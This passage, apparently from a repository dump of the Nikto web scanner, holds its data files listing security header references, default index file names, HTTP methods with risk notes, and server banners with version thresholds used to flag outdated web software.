readability)\n#######################################################################\n#\"header\",\"reference\"\n\"content-security-policy\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP\"\n\"permissions-policy\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy\"\n\"referrer-policy\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy\"\n\"strict-transport-security\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security\"\n\"x-content-type-options\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options\"\n"
  },
  {
    "path": "program/databases/db_multiple_index",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n\"index\"\n\"index.php\"\n\"index.php3\"\n\"index.php4\"\n\"index.php5\"\n\"index.php7\"\n\"index.html\"\n\"index.htm\"\n\"index.shtml\"\n\"index.cfm\"\n\"index.cgi\"\n\"index.pl\"\n\"index.asp\"\n\"index.aspx\"\n\"default.asp\"\n\"default.aspx\"\n\"default.htm\"\n\"index.do\"\n\"index.jhtml\"\n\"index.jsp\"\n\"index.xml\"\n"
  },
  {
    "path": "program/databases/db_options",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n\"nikto_id\",\"method\",\"references\",\"message\"\n\"400000\",\"DELETE\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/DELETE\",\"HTTP method ('@TYPE@' Header): 'DELETE' may allow clients to remove files on the web server.\"\n\"400001\",\"PUT\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/PUT\",\"HTTP method ('@TYPE@' Header): 'PUT' method could allow clients to save files on the web server.\"\n\"400002\",\"MOVE\",\"https://tools.ietf.org/html/rfc3744\",\"HTTP method ('@TYPE@' Header): 'MOVE' may allow clients to change file locations on the web server.\"\n\"400003\",\"CONNECT\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/CONNECT\",\"HTTP method ('@TYPE@' Header): 'CONNECT' may allow server to proxy client requests.\"\n\"400004\",\"PATCH\",\"https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/PATCH\",\"HTTP method: 'PATCH' may allow client to issue patch commands to server. See RFC-5789.\"\n# WebDAV methods - \"0\" in nikto_id tells the code to treat it differently\n\"0\",\"PROPFIND\",\"https://tools.ietf.org/html/rfc3744\",\"webdav\"\n\"0\",\"PROPPATCH\",\"https://tools.ietf.org/html/rfc3744\",\"webdav\"\n\"0\",\"COPY\",\"https://tools.ietf.org/html/rfc3744\",\"webdav\"\n\"0\",\"LOCK\",\"https://tools.ietf.org/html/rfc3744\",\"webdav\"\n\"0\",\"UNLOCK\",\"https://tools.ietf.org/html/rfc3744\",\"webdav\"\n\"0\",\"SEARCH\",\"https://tools.ietf.org/html/rfc3744\",\"webdav\"\n\"0\",\"MKCOL\",\"https://tools.ietf.org/html/rfc3744\",\"webdav\"\n"
  },
  {
    "path": "program/databases/db_outdated",
    "content": "#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (sullo@cirt.net)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\n#\"nikto_id\",\"server\",\"version\",\"message\"\n\"600000\",\"\\(www\\.ebdesk\\.com\\)/\",\"1.3.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600001\",\"0W/\",\"0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600002\",\"3Com/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600003\",\"3Com/v\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600004\",\"4D_WebStar_D/\",\"7.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600005\",\"4D_WebSTAR_S/\",\"5.4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600006\",\"4n4l0g4l1f3/\",\"31337\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600007\",\"a-p-a-c-h-e/\",\"1-3-26\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600008\",\"ABWS/\",\"537\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600009\",\"Abyss/\",\"2.16.9.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600010\",\"AbyssLib/\",\"2.16.9.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600011\",\"Academy/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600012\",\"accela/\",\"1.92\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600013\",\"Accipiter-DirectServer/\",\"6.0.0.36\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600014\",\"ACI-4D/\",\"6.57\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600015\",\"Acme.Serve/\",\"v1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600016\",\"ActiveAgent/\",\"4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600017\",\"ActiveLinks/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600018\",\"ActuateHttpService/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600019\",\"Adaptec ASM \",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600020\",\"ADSM_HTTP/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600021\",\"AdSubtract\",\"2.54\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600022\",\"adtag/\",\"1.0a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600023\",\"Adtran Embedded HTTP Server \",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600024\",\"aEGiS_nanoweb/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600025\",\"AG/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600026\",\"AGAVA.Banners/\",\"1.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600027\",\"Agent-ListenServer-HttpSvr/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600028\",\"Agranat-EmWeb/\",\"R5_2_6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600029\",\"Agranat/\",\"Agranat-EmWeb/R5_2_6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600030\",\"Alchemy Eye/\",\"Alchemy Eye/3.0.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600031\",\"AlkalineSearchEngine/\",\"1.\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600032\",\"Allegro-Software-RomPager/\",\"4.61\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600033\",\"AllegroServe/\",\"1.2.24\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600034\",\"AMOS-HTTPD/\",\"1.5A127\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600035\",\"AMOS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600036\",\"Analogx\",\"1.0.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600037\",\"Anonymous/\",\"1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600038\",\"anses/\",\"1.16\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600039\",\"AnWeb/\",\"1.42p\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600040\",\"AOLserver/ \",\"4.5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600041\",\"Apache Coyote/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600042\",\"Apache Tomcat/\",\"8.0.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Tomcat 7.0.57, 6.0.41, 5.5.36 and 4.1.40 are also current.\"\n\"600044\",\"Apache-AdvancedExtranetServer/\",\"2.0.53\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600045\",\"Apache-Coyote/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600046\",\"Apache-NeoNova/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600047\",\"Apache-NeoWebScript/\",\"2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600048\",\"Apache-SSL-US/\",\"1.1.1+1.2+1.3b3-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600049\",\"Apache-SSL/\",\"1.36\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600050\",\"Apache/\",\"2.4.66\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER).\"\n\"600051\",\"apachejserv/\",\"1.1.2i\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600052\",\"ApacheSSL/\",\"2.0.58\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600053\",\"AppleEmbeddedWebServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600054\",\"AppleShareIP/\",\"6.3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600055\",\"ARIN-HTTPd/\",\"1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600056\",\"ARM/\",\"06TD.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600057\",\"ArtBlast/\",\"3.5.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600058\",\"ASP/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600059\",\"AtermWARPSTAR/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600060\",\"auth_external/\",\"2.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600061\",\"auth_kerberos/\",\"4.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600062\",\"auth_ldap/\",\"1.6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600063\",\"auth_mysql/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600064\",\"auth_radius/\",\"1.7PR1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600065\",\"AuthentiCache/\",\"2.0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600066\",\"AuthMySQL/\",\"4.3.9-2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600067\",\"AuthMySQL/\",\"deam.org-1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600068\",\"AuthMySQL/\",\"trans-1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600069\",\"AuthMySQLD/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600070\",\"AuthNuSphere/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600071\",\"AuthPG/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600072\",\"AuthPostgreSQL/\",\"0.9.7d\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600073\",\"AuthSMB/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600074\",\"AuthTDS/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600075\",\"AV/\",\"1.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600076\",\"Awhttpd/\",\"Awhttpd/2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600077\",\"AWS/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600078\",\"AXISThinWizard/\",\"v3.05.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600079\",\"AxKit/\",\"1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600080\",\"balanced_by_mod_backhand/\",\"1.1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600081\",\"BaseHTTP/\",\"0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600082\",\"BBC \",\"06.21.501\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600083\",\"BBCE/\",\"6.6.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600084\",\"BeatBoxCapture/\",\"6.5.64\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600085\",\"Ben-SSL/\",\"1.60\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600086\",\"beta/\",\"0.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600087\",\"BigFix HTTP Server/\",\"5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600088\",\"BillGatesSeinWebServer/\",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600089\",\"BiRD/\",\"0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600090\",\"bkhttp/\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600091\",\"Blazix/\",\"1.2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600092\",\"Bluestem/\",\"0.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600093\",\"Boa/\",\"0.94.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600094\",\"BOA/\",\"1.2.2c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600095\",\"bozohttpd/\",\"20060517\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600096\",\"broker/\",\"8.7.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600097\",\"BRS-WebWeaver/\",\"1.33\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600098\",\"BSAFE-SSL-C/\",\"1.0.0i\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600099\",\"BSDI/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600100\",\"BunnyServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600101\",\"buser/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600102\",\"BustaWS/\",\"3.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600103\",\"bw/\",\"3.37\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600104\",\"BWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600105\",\"C2NetEU/\",\"3012\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600106\",\"C2NetUS/\",\"2011\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600107\",\"Canon Http Server \",\"2.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600108\",\"Caudium/\",\"1.4.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600109\",\"CCO/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600110\",\"CERN/\",\"3.0A\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600111\",\"CheckPointSVNfoundation/\",\"NGFP2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600112\",\"Cheetah/\",\"2.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600113\",\"Cherry/\",\"6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600114\",\"CherryPy/\",\"3.2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600115\",\"Chili!Soft-ASP/\",\"3.6.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600116\",\"cisco-CPA/\",\"cisco-CPA/3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600117\",\"cisco-IOS/\",\"12.1 HTTP-server/1.0(1)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600118\",\"CiteHTTPD/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600119\",\"Citysearch-Apache/\",\"1.3.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600120\",\"CL-HTTP\",\"70.190\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600121\",\"CM4all-JailCGI/\",\"1.4.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600122\",\"CMS_Pipelines/\",\"1.0110\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600123\",\"CMS/\",\"20.000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600124\",\"CoffeeMaker/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600125\",\"Commerce-Builder/\",\"2.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600126\",\"CommerceServer400/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600127\",\"CommuniGatePro/\",\"5.4.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600128\",\"Communique/\",\"4.3.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600129\",\"CommuniqueServletEngine/\",\"4.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600130\",\"CompaqHTTPServer/\",\"9.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600131\",\"ConcentricHost-Ashurbanipal/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600132\",\"ConcentricHost-NaramSin/\",\"1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600133\",\"ConductorSNMP/\",\"1.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600134\",\"ConferenceRoom/\",\"3.5.0.2-SEC.win32-ws2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600135\",\"confproxy/\",\"3.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600136\",\"CoolWeb/\",\"3.8.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600137\",\"Core/\",\"3.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600138\",\"Cougar \",\"9.01.01.5001\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600139\",\"covalent_auth/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600140\",\"CovalentSSL/\",\"2.1.03.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600141\",\"Coyote/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600142\",\"cpaneld/\",\"cpaneld/6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600143\",\"cpsrvd/\",\"11.32.3.21\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600144\",\"Crossing/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600145\",\"Cryptoveg/\",\"4.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600146\",\"CSacek/\",\"2.1.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600147\",\"Cthulhu/\",\"0.23a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600148\",\"CUPS/\",\"2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600149\",\"da.ru/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600150\",\"DartWebServerTool/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600151\",\"DAV/\",\"2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600152\",\"David-WebBox/\",\"12.00a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600153\",\"Debut/\",\"1.08\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600154\",\"DeleGate/\",\"8.5.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600155\",\"DeltaEdgeCache/\",\"release-2-28-rc2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600156\",\"DHost/\",\"9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600157\",\"diffprivs/\",\"20030624\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600158\",\"Dina HTTPd Server/\",\"1.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600159\",\"DinaHTTPdServer/\",\"1.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600160\",\"Dixienet/\",\"6.6.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600161\",\"DLXApache/\",\"4.3.29\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600162\",\"DMMWeb/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600163\",\"Domestic/\",\"v2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600164\",\"Domino-Go-Webserver/\",\"4.6.2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600165\",\"DotTV Webserver \",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600166\",\"DSS/\",\"6.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600167\",\"dwhttpd/\",\"dwhttpd/4.2a7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600168\",\"dynamicScale/\",\"2.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600169\",\"E-Neverland Data Palm/\",\"1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600170\",\"e/FSV-\",\"28-01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600171\",\"eBD/\",\"3.2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600172\",\"ebLogic XMLX Module \",\"8.1 SP1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600173\",\"EHTTP/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600174\",\"EIMWebServer/\",\"3.35\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600175\",\"Embedded HTTP Server\",\"2.0f\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600176\",\"Embperl/\",\"2.3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600177\",\"EMWHTTPD/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600178\",\"Engine/\",\"8.1.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600179\",\"Enhydra-MultiServer/\",\"3.1.1b1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600180\",\"Entangle/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600181\",\"EnterpriseWeb/\",\"1.1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600182\",\"ePerl/\",\"2.2.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600183\",\"Eplicator/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600184\",\"EPSON-HTTP/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600185\",\"EServ/\",\"3.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600186\",\"ESMWEBSERVERS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600187\",\"eVisMUX/\",\"6.0.51212128\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600188\",\"EWS-NIC3/\",\"6.31\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600189\",\"EWS-NIC4/\",\"8.43\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600190\",\"Ews/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600191\",\"Export/\",\"v2.0-1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600192\",\"exteNdApplicationServer/\",\"100.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600193\",\"ExtraWeb/\",\"4.0.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600194\",\"fhttpd/\",\"0.4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600195\",\"FileMakerPro/\",\"6.0v4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600196\",\"filter/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600197\",\"FireSite/\",\"2.7_PPC\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600198\",\"FirstClass/\",\"8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600199\",\"FJapache/\",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600200\",\"fnord-spb/\",\"280604\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600201\",\"fnord/\",\"1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600202\",\"FooServe/\",\"0.1a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600203\",\"Footprint\",\"4.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600204\",\"FortiWeb-\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600205\",\"FoundryNetworks/\",\"2.20\",\"@RUNNING_VER appears to be outdated (current is at least 